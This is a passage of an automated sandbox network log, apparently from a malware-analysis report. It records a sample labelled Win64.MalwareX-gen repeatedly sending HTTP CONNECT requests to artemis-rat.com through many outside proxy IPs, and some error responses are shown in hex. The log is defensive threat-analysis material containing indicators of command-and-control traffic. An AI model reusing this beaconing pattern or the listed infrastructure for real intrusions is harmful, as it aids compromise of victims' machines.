                                              Mar 11, 2024 08:38:39.131872892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:27.131901026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1776192.168.2.45495364.227.108.25319087284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.645445108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.054104090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1777192.168.2.451862192.99.207.129445237284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.732919931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.757117987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.848779917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1778192.168.2.451834162.223.91.11807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.734009981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:30.975379944 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:38:30 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1779192.168.2.451910172.245.159.177807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.734025002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.757111073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.848782063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:38.890804052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:51.053817987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:03.132287979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:15.131942987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:16.325578928 CET323INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.9.9
                                              Date: Mon, 11 Mar 2024 07:38:16 GMT
                                              Content-Type: text/html
                                              Content-Length: 172
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 39 2e 39 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.9.9</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1780192.168.2.451784162.214.121.173645797284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.739792109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.866569996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.866779089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:38.871040106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1781192.168.2.45184658.246.58.15090027284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.831753016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.150367022 CET311INHTTP/1.1 400 Bad Request
                                              Server: nginx
                                              Date: Mon, 11 Mar 2024 07:37:27 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1782192.168.2.455256116.99.226.184310707284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.832477093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1783192.168.2.451804188.166.56.246807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.839210033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.866518021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.960169077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:34.301150084 CET536INHTTP/1.1 500 Internal Server Error
                                              Date: Mon, 11 Mar 2024 07:37:34 GMT
                                              Server: Apache/2.4.38 (Debian)
                                              Content-Length: 614
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 6d 61 78 6c 65 67 67 69 65 72 69 40 67 6d 61 69 6c 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at maxleggieri@gmail.com to inform them
                                              Mar 11, 2024 08:37:34.301302910 CET270INData Raw: 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65
                                              Data Ascii: of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.38 (Debian) Server at api.growbot.dk Port 8


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1784192.168.2.451903171.244.140.160374007284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.842216969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.866599083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.960150957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:39.069880962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1785192.168.2.455258192.252.220.92173287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.852236032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1786192.168.2.45185937.187.73.7236377284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.862555981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.866575003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.866779089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:38.871146917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:51.053818941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1787192.168.2.451957177.85.65.17741537284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.864326000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1788192.168.2.451852201.39.229.148807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.867955923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.069351912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.069956064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:39.069998980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:51.163131952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:03.163062096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1789192.168.2.45212737.187.73.7125827284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.898519993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.069530010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1790192.168.2.455236194.4.50.62123347284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.899454117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1791192.168.2.452116193.239.58.9280817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.901937008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1792192.168.2.45241124.249.199.1241457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.921763897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1793192.168.2.454337203.96.177.211550057284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.991295099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.069746971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.069983006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:39.069998980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:51.163129091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:03.164267063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:15.163079023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:39.319494963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:27.334984064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1794192.168.2.452096185.132.242.21280837284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
